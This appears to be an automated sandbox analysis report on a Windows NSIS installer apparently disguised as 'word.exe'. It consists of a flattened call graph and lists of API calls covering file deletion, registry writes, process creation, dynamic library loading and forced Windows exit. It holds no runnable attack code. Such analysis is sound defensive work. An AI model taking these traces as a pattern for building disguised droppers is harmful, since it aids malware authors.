3600->3575 3601->3599 3602->3603 3605 40140b 2 API calls 3603->3605 3604->3575 3605->3575 3606->3439 3607->3484 3608->3453 3609->3495 3610->3499 3612 4058a9 GetTickCount GetTempFileNameA 3611->3612 3613 4058d5 3612->3613 3614 4030f9 3612->3614 3613->3612 3613->3614 3614->3441 3615->3524 3616->3526 3617->3530 3619 402c12 3618->3619 3620 402bfa 3618->3620 3623 402c22 GetTickCount 3619->3623 3624 402c1a 3619->3624 3621 402c03 DestroyWindow 3620->3621 3622 402c0a 3620->3622 3621->3622 3622->3533 3626 402c30 CreateDialogParamA ShowWindow 3623->3626 3627 402c53 3623->3627 3625 405f64 2 API calls 3624->3625 3628 402c20 3625->3628 3626->3627 3627->3533 3628->3533 3629->3539 3630->3540 3632 4038c8 3631->3632 3649 405af6 wsprintfA 3632->3649 3634 403939 3635 405bba 18 API calls 3634->3635 3636 403945 SetWindowTextA 3635->3636 3637 403961 3636->3637 3638 403666 3636->3638 3637->3638 3639 405bba 18 API calls 3637->3639 3638->3563 3639->3637 3640->3559 3641->3565 3643 403ea0 SendMessageA 3642->3643 3644 404f79 3643->3644 3647 401389 2 API calls 3644->3647 3648 404fa0 3644->3648 3645 403ea0 SendMessageA 3646 404fb2 OleUninitialize 3645->3646 3646->3595 3647->3644 3648->3645 3649->3634 4097 4014fe 4098 401506 4097->4098 4100 401519 4097->4100 4099 402a0c 18 API calls 4098->4099 4099->4100 4101 4025ff 4102 402606 4101->4102 4103 40286b 4101->4103 4104 402a0c 18 API calls 4102->4104 4105 402611 4104->4105 4106 402618 SetFilePointer 4105->4106 4106->4103 4107 402628 4106->4107 4109 405af6 wsprintfA 4107->4109 4109->4103 4110 401000 4111 401037 BeginPaint GetClientRect 4110->4111 4113 40100c DefWindowProcA 4110->4113 4114 4010f3 4111->4114 4117 401179 4113->4117 4115 401073 CreateBrushIndirect FillRect DeleteObject 4114->4115 4116 4010fc 4114->4116 4115->4114 4118 401102 CreateFontIndirectA 4116->4118 4119 401167 EndPaint 4116->4119 4118->4119 4120 401112 6 API calls 4118->4120 4119->4117 4120->4119 3127 403981 3128 403ad4 3127->3128 3129 403999 3127->3129 3130 403b25 3128->3130 3131 403ae5 GetDlgItem GetDlgItem 3128->3131 3129->3128 3132 4039a5 3129->3132 3134 403b7f 3130->3134 3226 401389 3130->3226 3223 403e54 3131->3223 3135 4039b0 SetWindowPos 3132->3135 3136 4039c3 3132->3136 3145 403acf 3134->3145 3200 403ea0 3134->3200 3135->3136 3137 4039e0 3136->3137 3138 4039c8 ShowWindow 3136->3138 3141 403a02 3137->3141 3142 4039e8 DestroyWindow 3137->3142 3138->3137 3139 403b0f SetClassLongA 3143 40140b 2 API calls 3139->3143 3147 403a07 SetWindowLongA 3141->3147 3148 403a18 3141->3148 3146 403dfe 3142->3146 3143->3130 3146->3145 3155 403e0e ShowWindow 3146->3155 3147->3145 3152 403ac1 3148->3152 3153 403a24 GetDlgItem 3148->3153 3150 40140b 2 API calls 3167 403b91 3150->3167 3151 403ddf DestroyWindow EndDialog 3151->3146 3209 403ebb 3152->3209 3156 403a54 3153->3156 3157 403a37 SendMessageA IsWindowEnabled 3153->3157 3154 403b5b SendMessageA 3154->3145 3155->3145 3160 403a61 3156->3160 3162 403aa8 SendMessageA 3156->3162 3163 403a74 3156->3163 3171 403a59 3156->3171 3157->3145 3157->3156 3159 405bba 18 API calls 3159->3167 3160->3162 3160->3171 3162->3152 3164 403a91 3163->3164 3165 403a7c 3163->3165 3169 40140b 2 API calls 3164->3169 3203 40140b 3165->3203 3166 403a8f 3166->3152 3167->3150 3167->3151 3167->3159 3170 403e54 19 API calls 3167->3170 3173 403e54 19 API calls 3167->3173 3172 403a98 3169->3172 3170->3167 3206 403e2d 3171->3206 3172->3152 3172->3171 3174 403c0c GetDlgItem 3173->3174 3175 403c21 3174->3175 3176 403c29 ShowWindow EnableWindow 3174->3176 3175->3176 3230 403e76 EnableWindow 3176->3230 3178 403c53 EnableWindow 3181 403c67 3178->3181 3179 403c6c GetSystemMenu EnableMenuItem SendMessageA 3180 403c9c SendMessageA 3179->3180 3179->3181 3180->3181 3181->3179 3231 403e89 SendMessageA 3181->3231 3232 405b98 lstrcpynA 3181->3232 3184 403cca lstrlenA 3185 405bba 18 API calls 3184->3185 3186 403cdb SetWindowTextA 3185->3186 3187 401389 2 API calls 3186->3187 3188 403cec 3187->3188 3188->3145 3188->3167 3189 403d1f DestroyWindow 3188->3189 3191 403d1a 3188->3191 3189->3146 3190 403d39 CreateDialogParamA 3189->3190 3190->3146 3192 403d6c 3190->3192 3191->3145 3193 403e54 19 API calls 3192->3193 3194 403d77 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3193->3194 3195 401389 2 API calls 3194->3195 3196 403dbd 3195->3196 3196->3145 3197 403dc5 ShowWindow 3196->3197 3198 403ea0 SendMessageA 3197->3198 3199 403ddd 3198->3199 3199->3146 3201 403eb8 3200->3201 3202 403ea9 SendMessageA 3200->3202 3201->3167 3202->3201 3204 401389 2 API calls 3203->3204 3205 401420 3204->3205 3205->3171 3207 403e34 3206->3207 3208 403e3a SendMessageA 3206->3208 3207->3208 3208->3166 3210 403ed3 GetWindowLongA 3209->3210 3220 403f5c 3209->3220 3211 403ee4 3210->3211 3210->3220 3212 403ef3 GetSysColor 3211->3212 3213 403ef6 3211->3213 3212->3213 3214 403f06 SetBkMode 3213->3214 3215 403efc SetTextColor 3213->3215 3216 403f24 3214->3216 3217 403f1e GetSysColor 3214->3217 3215->3214 3218 403f35 3216->3218 3219 403f2b SetBkColor 3216->3219 3217->3216 3218->3220 3221 403f48 DeleteObject 3218->3221 3222 403f4f CreateBrushIndirect 3218->3222 3219->3218 3220->3145 3221->3222 3222->3220 3224 405bba 18 API calls 3223->3224 3225 403e5f SetDlgItemTextA 3224->3225 3225->3139 3227 401390 3226->3227 3228 4013fe 3227->3228 3229 4013cb MulDiv SendMessageA 3227->3229 3228->3134 3228->3154 3229->3227 3230->3178 3231->3181 3232->3184 4121 401b02 4122 402a29 18 API calls 4121->4122 4123 401b09 4122->4123 4124 402a0c 18 API calls 4123->4124 4125 401b12 wsprintfA 4124->4125 4126 4028be 4125->4126 4127 401a03 4128 402a29 18 API calls 4127->4128 4129 401a0c ExpandEnvironmentStringsA 4128->4129 4130 401a20 4129->4130 4132 401a33 4129->4132 4131 401a25 lstrcmpA 4130->4131 4130->4132 4131->4132 4133 401f84 4134 401f96 4133->4134 4144 402045 4133->4144 4135 402a29 18 API calls 4134->4135 4136 401f9d 4135->4136 4138 402a29 18 API calls 4136->4138 4137 401423 25 API calls 4139 40219c 4137->4139 4140 401fa6 4138->4140 4141 401fbb LoadLibraryExA 4140->4141 4142 401fae GetModuleHandleA 4140->4142 4143 401fcb GetProcAddress 4141->4143 4141->4144 4142->4141 4142->4143 4145 402018 4143->4145 4146 401fdb 4143->4146 4144->4137 4147 404e84 25 API calls 4145->4147 4148 401423 25 API calls 4146->4148 4149 401feb 4146->4149 4147->4149 4148->4149 4149->4139 4150 402039 FreeLibrary 4149->4150 4150->4139 4165 401c8a 4166 402a0c 18 API calls 4165->4166 4167 401c90 IsWindow 4166->4167 4168 4019f3 4167->4168 4169 401490 4170 404e84 25 API calls 4169->4170 4171 401497 4170->4171 3233 403511 3234 403529 3233->3234 3235 40351b CloseHandle 3233->3235 3240 403556 3234->3240 3235->3234 3241 403564 3240->3241 3242 40352e 3241->3242 3243 403569 FreeLibrary GlobalFree 3241->3243 3244 4054bd 3242->3244 3243->3242 3243->3243 3286 40576c 3244->3286 3247 4054f1 3250 405626 3247->3250 3300 405b98 lstrcpynA 3247->3300 3248 4054da DeleteFileA 3249 40353a 3248->3249 3250->3249 3257 405e93 2 API calls 3250->3257 3252 40551b 3253 40552c 3252->3253 3254 40551f lstrcatA 3252->3254 3301 4056d2 lstrlenA 3253->3301 3255 405532 3254->3255 3258 405540 lstrcatA 3255->3258 3260 40554b lstrlenA FindFirstFileA 3255->3260 3259 40564b 3257->3259 3258->3260 3259->3249 3261 40568b 3 API calls 3259->3261 3260->3250 3281 40556f 3260->3281 3263 405655 3261->3263 3262 4056b6 CharNextA 3262->3281 3264 405850 2 API calls 3263->3264 3265 40565b RemoveDirectoryA 3264->3265 3266 405666 3265->3266 3267 40567d 3265->3267 3266->3249 3269 40566c 3266->3269 3270 404e84 25 API calls 3267->3270 3272 404e84 25 API calls 3269->3272 3270->3249 3271 405605 FindNextFileA 3273 40561d FindClose 3271->3273 3271->3281 3275 405674 3272->3275 3273->3250 3274 4055cc 3277 405850 2 API calls 3274->3277 3276 4058e6 40 API calls 3275->3276 3279 40567b 3276->3279 3280 4055d2 DeleteFileA 3277->3280 3278 4054bd 61 API calls 3278->3281 3279->3249 3285 4055dd 3280->3285 3281->3262 3281->3271 3281->3274 3281->3278 3305 405b98 lstrcpynA 3281->3305 3282 404e84 25 API calls 3282->3271 3283 404e84 25 API calls 3283->3285 3285->3271 3285->3282 3285->3283 3306 4058e6 3285->3306 3332 405b98 lstrcpynA 3286->3332 3288 40577d 3333 40571f CharNextA CharNextA 3288->3333 3291 4054d1 3291->3247 3291->3248 3292 405dfa 5 API calls 3298 405793 3292->3298 3293 4057be lstrlenA 3294 4057c9 3293->3294 3293->3298 3295 40568b 3 API calls 3294->3295 3297 4057ce GetFileAttributesA 3295->3297 3296 405e93 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 4056d2 2 API calls 3298->3299 3299->3293 3300->3252 3302 4056df 3301->3302 3303 4056f0 3302->3303 3304 4056e4 CharPrevA 3302->3304 3303->3255 3304->3302 3304->3303 3305->3281 3339 405f28 GetModuleHandleA 3306->3339 3309 40594e GetShortPathNameA 3310 405963 3309->3310 3314 405a43 3309->3314 3313 40596b wsprintfA 3310->3313 3310->3314 3312 405932 CloseHandle GetShortPathNameA 3312->3314 3315 405946 3312->3315 3316 405bba 18 API calls 3313->3316 3314->3285 3315->3309 3315->3314 3317 405993 3316->3317 3346 40586f GetFileAttributesA CreateFileA 3317->3346 3319 4059a0 3319->3314 3320 4059af GetFileSize GlobalAlloc 3319->3320 3321 405a3c CloseHandle 3320->3321 3322 4059cd ReadFile 3320->3322 3321->3314 3322->3321 3323 4059e1 3322->3323 3323->3321 3347 4057e4 lstrlenA 3323->3347 3326 405a50 3329 4057e4 4 API calls 3326->3329 3327 4059f6 3352 405b98 lstrcpynA 3327->3352 3330 405a04 3329->3330 3331 405a17 SetFilePointer WriteFile GlobalFree 3330->3331 3331->3321 3332->3288 3334 405739 3333->3334 3336 405745 3333->3336 3335 405740 CharNextA 3334->3335 3334->3336 3338 405762 3335->3338 3337 4056b6 CharNextA 3336->3337 3336->3338 3337->3336 3338->3291 3338->3292 3340 405f44 3339->3340 3341 405f4e GetProcAddress 3339->3341 3353 405eba GetSystemDirectoryA 3340->3353 3343 4058f1 3341->3343 3343->3309 3343->3314 3345 40586f GetFileAttributesA CreateFileA 3343->3345 3344 405f4a 3344->3341 3344->3343 3345->3312 3346->3319 3348 40581a lstrlenA 3347->3348 3349 405824 3348->3349 3350 4057f8 lstrcmpiA 3348->3350 3349->3326 3349->3327 3350->3349 3351 405811 CharNextA 3350->3351 3351->3348 3352->3330 3355 405edc wsprintfA LoadLibraryExA 3353->3355 3355->3344 4179 404292 4180 4042be 4179->4180 4181 4042cf 4179->4181 4240 40543d GetDlgItemTextA 4180->4240 4183 4042db GetDlgItem 4181->4183 4188 40433a 4181->4188 4185 4042ef 4183->4185 4184 4042c9 4187 405dfa 5 API calls 4184->4187 4190 404303 SetWindowTextA 4185->4190 4195 40571f 4 API calls 4185->4195 4186 40441e 4238 4045c8 4186->4238 4242 40543d GetDlgItemTextA 4186->4242 4187->4181 4188->4186 4192 405bba 18 API calls 4188->4192 4188->4238 4193 403e54 19 API calls 4190->4193 4191 40444e 4196 40576c 18 API calls 4191->4196 4197 4043ae SHBrowseForFolderA 4192->4197 4198 40431f 4193->4198 4194 403ebb 8 API calls 4199 4045dc 4194->4199 4200 4042f9 4195->4200 4201 404454 4196->4201 4197->4186 4202 4043c6 CoTaskMemFree 4197->4202 4203 403e54 19 API calls 4198->4203 4200->4190 4204 40568b 3 API calls 4200->4204 4243 405b98 lstrcpynA 4201->4243 4205 40568b 3 API calls 4202->4205 4206 40432d 4203->4206 4204->4190 4207 4043d3 4205->4207 4241 403e89 SendMessageA 4206->4241 4210 40440a SetDlgItemTextA 4207->4210 4215 405bba 18 API calls 4207->4215 4210->4186 4211 404333 4213 405f28 5 API calls 4211->4213 4212 40446b 4214 405f28 5 API calls 4212->4214 4213->4188 4222 404472 4214->4222 4216 4043f2 lstrcmpiA 4215->4216 4216->4210 4219 404403 lstrcatA 4216->4219 4217 4044ae 4244 405b98 lstrcpynA 4217->4244 4219->4210 4220 4044b5 4221 40571f 4 API calls 4220->4221 4223 4044bb GetDiskFreeSpaceA 4221->4223 4222->4217 4225 4056d2 2 API calls 4222->4225 4227 404506 4222->4227 4226 4044df MulDiv 4223->4226 4223->4227 4225->4222 4226->4227 4228 404577 4227->4228 4229 40470e 21 API calls 4227->4229 4230 40459a 4228->4230 4231 40140b 2 API calls 4228->4231 4232 404564 4229->4232 4245 403e76 EnableWindow 4230->4245 4231->4230 4234 404579 SetDlgItemTextA 4232->4234 4235 404569 4232->4235 4234->4228 4237 404649 21 API calls 4235->4237 4236 4045b6 4236->4238 4246 404227 4236->4246 4237->4228 4238->4194 4240->4184 4241->4211 4242->4191 4243->4212 4244->4220 4245->4236 4247 404235 4246->4247 4248 40423a SendMessageA 4246->4248 4247->4248 4248->4238 4249 401595 4250 402a29 18 API calls 4249->4250 4251 40159c SetFileAttributesA 4250->4251 4252 4015ae 4251->4252 4253 401717 4254 402a29 18 API calls 4253->4254 4255 40171e SearchPathA 4254->4255 4256 401739 4255->4256 4257 402899 SendMessageA 4258 4028b3 InvalidateRect 4257->4258 4259 4028be 4257->4259 4258->4259 4260 40229a 4261 402a29 18 API calls 4260->4261 4262 4022a8 4261->4262 4263 402a29 18 API calls 4262->4263 4264 4022b1 4263->4264 4265 402a29 18 API calls 4264->4265 4266 4022bb GetPrivateProfileStringA 4265->4266 4267 403f9c 4268 403fb2 4267->4268 4273 4040bf 4267->4273 4271 403e54 19 API calls 4268->4271 4269 40412e 4270 404202 4269->4270 4272 404138 GetDlgItem 4269->4272 4278 403ebb 8 API calls 4270->4278 4274 404008 4271->4274 4275 4041c0 4272->4275 4276 40414e 4272->4276 4273->4269 4273->4270 4277 404103 GetDlgItem SendMessageA 4273->4277 4279 403e54 19 API calls 4274->4279 4275->4270 4281 4041d2 4275->4281 4276->4275 4280 404174 6 API calls 4276->4280 4298 403e76 EnableWindow 4277->4298 4283 4041fd 4278->4283 4284 404015 CheckDlgButton 4279->4284 4280->4275 4285 4041d8 SendMessageA 4281->4285 4286 4041e9 4281->4286 4296 403e76 EnableWindow 4284->4296 4285->4286 4286->4283 4289 4041ef SendMessageA 4286->4289 4287 404129 4290 404227 SendMessageA 4287->4290 4289->4283 4290->4269 4291 404033 GetDlgItem 4297 403e89 SendMessageA 4291->4297 4293 404049 SendMessageA 4294 404070 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4293->4294 4295 404067 GetSysColor 4293->4295 4294->4283 4295->4294 4296->4291 4297->4293 4298->4287 4299 40149d 4300 402241 4299->4300 4301 4014ab PostQuitMessage 4299->4301 4301->4300 4309 401b23 4310 401b30 4309->4310 4311 401b74 4309->4311 4312 40222e 4310->4312 4319 401b47 4310->4319 4313 401b78 4311->4313 4314 401b9d GlobalAlloc 4311->4314 4316 405bba 18 API calls 4312->4316 4324 401bb8 4313->4324 4330 405b98 lstrcpynA 4313->4330 4315 405bba 18 API calls 4314->4315 4315->4324 4318 40223b 4316->4318 4322 405459 MessageBoxIndirectA 4318->4322 4328 405b98 lstrcpynA 4319->4328 4320 401b8a GlobalFree 4320->4324 4322->4324 4323 401b56 4329 405b98 lstrcpynA 4323->4329 4326 401b65 4331 405b98 lstrcpynA 4326->4331 4328->4323 4329->4326 4330->4320 4331->4324 4332 4021a5 4333 402a29 18 API calls 4332->4333 4334 4021ab 4333->4334 4335 402a29 18 API calls 4334->4335 4336 4021b4 4335->4336 4337 402a29 18 API calls 4336->4337 4338 4021bd 4337->4338 4339 405e93 2 API calls 4338->4339 4340 4021c6 4339->4340 4341 4021d7 lstrlenA lstrlenA 4340->4341 4342 4021ca 4340->4342 4344 404e84 25 API calls 4341->4344 4343 404e84 25 API calls 4342->4343 4346 4021d2 4342->4346 4343->4346 4345 402213 SHFileOperationA 4344->4345 4345->4342 4345->4346 4347 402227 4348 40222e 4347->4348 4352 402241 4347->4352 4349 405bba 18 API calls 4348->4349 4350 40223b 4349->4350 4351 405459 MessageBoxIndirectA 4350->4351 4351->4352 4353 401ca7 4354 402a0c 18 API calls 4353->4354 4355 401cae 4354->4355 4356 402a0c 18 API calls 4355->4356 4357 401cb6 GetDlgItem 4356->4357 4358 4024eb 4357->4358 4358->4358 4359 4035a9 4360 4035b4 4359->4360 4361 4035b8 4360->4361 4362 4035bb GlobalAlloc 4360->4362 4362->4361 4363 40262e 4364 402635 4363->4364 4365 4028be 4363->4365 4366 40263b FindClose 4364->4366 4366->4365 4367 4026af 4368 402a29 18 API calls 4367->4368 4370 4026bd 4368->4370 4369 4026d3 4372 405850 2 API calls 4369->4372 4370->4369 4371 402a29 18 API calls 4370->4371 4371->4369 4373 4026d9 4372->4373 4393 40586f GetFileAttributesA CreateFileA 4373->4393 4375 4026e6 4376 4026f2 GlobalAlloc 4375->4376 4377 40278f 4375->4377 4378 402786 CloseHandle 4376->4378 4379 40270b 4376->4379 4380 402797 DeleteFileA 4377->4380 4381 4027aa 4377->4381 4378->4377 4394 4030b3 SetFilePointer 4379->4394 4380->4381 4383 402711 4384 403081 ReadFile 4383->4384 4385 40271a GlobalAlloc 4384->4385 4386 40272a 4385->4386 4387 40275e WriteFile GlobalFree 4385->4387 4389 402e8e 37 API calls 4386->4389 4388 402e8e 37 API calls 4387->4388 4390 402783 4388->4390 4392 402737 4389->4392 4390->4378 4391 402755 GlobalFree 4391->4387 4392->4391 4393->4375 4394->4383 4395 4027b0 4396 402a0c 18 API calls 4395->4396 4397 4027b6 4396->4397 4398 4027f1 4397->4398 4399 4027da 4397->4399 4400 40268f 4397->4400 4401 402807 4398->4401 4402 4027fb 4398->4402 4403 4027df 4399->4403 4408 4027ee 4399->4408 4405 405bba 18 API calls 4401->4405 4404 402a0c 18 API calls 4402->4404 4409 405b98 lstrcpynA 4403->4409 4404->4408 4405->4408 4408->4400 4410 405af6 wsprintfA 4408->4410 4409->4400 4410->4400 4411 401eb2 4412 402a29 18 API calls 4411->4412 4413 401eb9 4412->4413 4414 405e93 2 API calls 4413->4414 4415 401ebf 4414->4415 4417 401ed1 4415->4417 4418 405af6 wsprintfA 4415->4418 4418->4417 3356 4015b3 3357 402a29 18 API calls 3356->3357 3358 4015ba 3357->3358 3359 40571f 4 API calls 3358->3359 3374 4015c2 3359->3374 3360 40161c 3362 401621 3360->3362 3363 40164a 3360->3363 3361 4056b6 CharNextA 3361->3374 3383 401423 3362->3383 3366 401423 25 API calls 3363->3366 3369 401642 3366->3369 3371 401633 SetCurrentDirectoryA 3371->3369 3372 401604 GetFileAttributesA 3372->3374 3374->3360 3374->3361 3374->3372 3375 4053e0 3374->3375 3378 405346 CreateDirectoryA 3374->3378 3387 4053c3 CreateDirectoryA 3374->3387 3376 405f28 5 API calls 3375->3376 3377 4053e7 3376->3377 3377->3374 3379 405397 GetLastError 3378->3379 3381 405393 3378->3381 3380 4053a6 SetFileSecurityA 3379->3380 3379->3381 3380->3381 3382 4053bc GetLastError 3380->3382 3381->3374 3382->3381 3384 404e84 25 API calls 3383->3384 3385 401431 3384->3385 3386 405b98 lstrcpynA 3385->3386 3386->3371 3388 4053d3 3387->3388 3389 4053d7 GetLastError 3387->3389 3388->3374 3389->3388 4419 4016b3 4420 402a29 18 API calls 4419->4420 4421 4016b9 GetFullPathNameA 4420->4421 4424 4016d0 4421->4424 4428 4016f1 4421->4428 4422 401705 GetShortPathNameA 4423 4028be 4422->4423 4425 405e93 2 API calls 4424->4425 4424->4428 4426 4016e1 4425->4426 4426->4428 4429 405b98 lstrcpynA 4426->4429 4428->4422 4428->4423 4429->4428 4430 402336 4431 40233c 4430->4431 4432 402a29 18 API calls 4431->4432 4433 40234e 4432->4433 4434 402a29 18 API calls 4433->4434 4435 402358 RegCreateKeyExA 4434->4435 4436 402382 4435->4436 4439 4028be 4435->4439 4437 402a29 18 API calls 4436->4437 4438 40239a 4436->4438 4440 402393 lstrlenA 4437->4440 4441 402a0c 18 API calls 4438->4441 4443 4023a6 4438->4443 4440->4438 4441->4443 4442 4023c1 RegSetValueExA 4445 4023d7 RegCloseKey 4442->4445 4443->4442 4444 402e8e 37 API calls 4443->4444 4444->4442 4445->4439 4447 402836 4448 402a0c 18 API calls 4447->4448 4449 40283c 4448->4449 4450 40284a 4449->4450 4451 40286d 4449->4451 4453 40268f 4449->4453 4450->4453 4455 405af6 wsprintfA 4450->4455 4452 405bba 18 API calls 4451->4452 4451->4453 4452->4453 4455->4453 4456 4014b7 4457 4014bd 4456->4457 4458 401389 2 API calls 4457->4458 4459 4014c5 4458->4459 3390 401e38 3391 402a29 18 API calls 3390->3391 3392 401e3e 3391->3392 3393 404e84 25 API calls 3392->3393 3394 401e48 3393->3394 3406 4053f8 CreateProcessA 3394->3406 3396 401ea4 CloseHandle 3400 40268f 3396->3400 3397 401e6d WaitForSingleObject 3398 401e4e 3397->3398 3399 401e7b GetExitCodeProcess 3397->3399 3398->3396 3398->3397 3398->3400 3409 405f64 3398->3409 3402 401e98 3399->3402 3403 401e8d 3399->3403 3402->3396 3405 401e96 3402->3405 3413 405af6 wsprintfA 3403->3413 3405->3396 3407 405433 3406->3407 3408 405427 CloseHandle 3406->3408 3407->3398 3408->3407 3410 405f81 PeekMessageA 3409->3410 3411 405f91 3410->3411 3412 405f77 DispatchMessageA 3410->3412 3411->3397 3412->3410 3413->3405 4460 401d38 GetDC GetDeviceCaps 4461 402a0c 18 API calls 4460->4461 4462 401d54 MulDiv 4461->4462 4463 402a0c 18 API calls 4462->4463 4464 401d69 4463->4464 4465 405bba 18 API calls 4464->4465 4466 401da2 CreateFontIndirectA 4465->4466 4467 4024eb 4466->4467 4475 402539 4476 402a0c 18 API calls 4475->4476 4479 402543 4476->4479 4477 4025b9 4478 402577 ReadFile 4478->4477 4478->4479 4479->4477 4479->4478 4480 4025bb 4479->4480 4481 4025cb 4479->4481 4484 405af6 wsprintfA 4480->4484 4481->4477 4483 4025e1 SetFilePointer 4481->4483 4483->4477 4484->4477 3650 40173e 3651 402a29 18 API calls 3650->3651 3652 401745 3651->3652 3653 40589e 2 API calls 3652->3653 3654 40174c 3653->3654 3655 40589e 2 API calls 3654->3655 3655->3654 4485 40193f 4486 402a29 18 API calls 4485->4486 4487 401946 lstrlenA 4486->4487 4488 4024eb 4487->4488

                                          Executed Functions

                                          Function 004030FB Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 315stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4030fb-403131 SetErrorMode GetVersion 1 403133-40313b call 405f28 0->1 2 403144 0->2 1->2 7 40313d 1->7 4 403149-40315c call 405eba lstrlenA 2->4 9 40315e-4031d0 call 405f28 * 2 #17 OleInitialize SHGetFileInfoA call 405b98 GetCommandLineA call 405b98 GetModuleHandleA 4->9 7->2 18 4031d2-4031d7 9->18 19 4031dc-4031f1 call 4056b6 CharNextA 9->19 18->19 22 40325a-40325e 19->22 23 403260 22->23 24 4031f3-4031f6 22->24 27 403273-40328b GetTempPathA call 4030ca 23->27 25 4031f8-4031fc 24->25 26 4031fe-403206 24->26 25->25 25->26 28 403208-403209 26->28 29 40320e-403211 26->29 37 4032b1-4032cb DeleteFileA call 402c55 27->37 38 40328d-4032ab GetWindowsDirectoryA lstrcatA call 4030ca 27->38 28->29 31 403213-403217 29->31 32 40324a-403257 call 4056b6 29->32 35 403229-40322f 31->35 36 403219-403222 31->36 32->22 49 403259 32->49 39 403241-403248 35->39 40 403231-40323a 35->40 36->35 43 403224 36->43 50 403332-403341 ExitProcess OleUninitialize 37->50 51 4032cd-4032d3 37->51 38->37 38->50 39->32 47 403262-40326e call 405b98 39->47 40->39 46 40323c 40->46 43->35 46->39 47->27 49->22 55 403456-40345c 50->55 56 403347-403357 call 405459 ExitProcess 50->56 53 403322-403329 call 4035eb 51->53 54 4032d5-4032de call 4056b6 51->54 62 40332e 53->62 68 4032e9-4032eb 54->68 60 403462-40347f call 405f28 * 3 55->60 61 4034f9-403501 55->61 83 403481-403483 60->83 84 4034c9-4034d7 call 405f28 60->84 64 403503 61->64 65 403507-40350b ExitProcess 61->65 62->50 64->65 71 4032e0-4032e6 68->71 72 4032ed-4032f7 68->72 71->72 74 4032e8 71->74 75 4032f9-403306 call 40576c 72->75 76 40335d-403371 call 4053e0 lstrcatA 72->76 74->68 75->50 87 403308-40331e call 405b98 * 2 75->87 85 403373-403379 lstrcatA 76->85 86 40337e-403398 lstrcatA lstrcmpiA 76->86 83->84 90 403485-403487 83->90 97 4034e5-4034f0 ExitWindowsEx 84->97 98 4034d9-4034e3 84->98 85->86 86->50 88 40339a-40339d 86->88 87->53 92 4033a6 call 4053c3 88->92 93 40339f-4033a4 call 405346 88->93 90->84 95 403489-40349b GetCurrentProcess 90->95 105 4033ab-4033b8 SetCurrentDirectoryA 92->105 93->105 95->84 111 40349d-4034bf 95->111 97->61 104 4034f2-4034f4 call 40140b 97->104 98->97 98->104 104->61 109 4033c5-4033df call 405b98 105->109 110 4033ba-4033c0 call 405b98 105->110 116 4033e4-403400 call 405bba DeleteFileA 109->116 110->109 111->84 119 403441-403448 116->119 120 403402-403412 CopyFileA 116->120 119->116 122 40344a-403451 call 4058e6 119->122 120->119 121 403414-403434 call 4058e6 call 405bba call 4053f8 120->121 121->119 131 403436-40343d CloseHandle 121->131 122->50 131->119
                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 00403121
                                          • GetVersion.KERNEL32 ref: 00403127
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                          • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                          • OleInitialize.OLE32(00000000), ref: 00403178
                                          • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                          • GetCommandLineA.KERNEL32(nrdosueajqjitn Setup,NSIS Error), ref: 004031A9
                                          • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 004031BC
                                          • CharNextA.USER32(00000000), ref: 004031E7
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                          • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • ExitProcess.KERNELBASE(00000020), ref: 00403332
                                          • OleUninitialize.OLE32 ref: 00403337
                                          • ExitProcess.KERNEL32 ref: 00403357
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 0040336A
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403379
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403384
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,C:\Users\user\AppData\Roaming\word.exe,00000000,00000020), ref: 00403390
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                          • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                          • CopyFileA.KERNEL32 ref: 0040340A
                                          • CloseHandle.KERNEL32(00000000), ref: 00403437
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                          • ExitProcess.KERNEL32 ref: 0040350B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
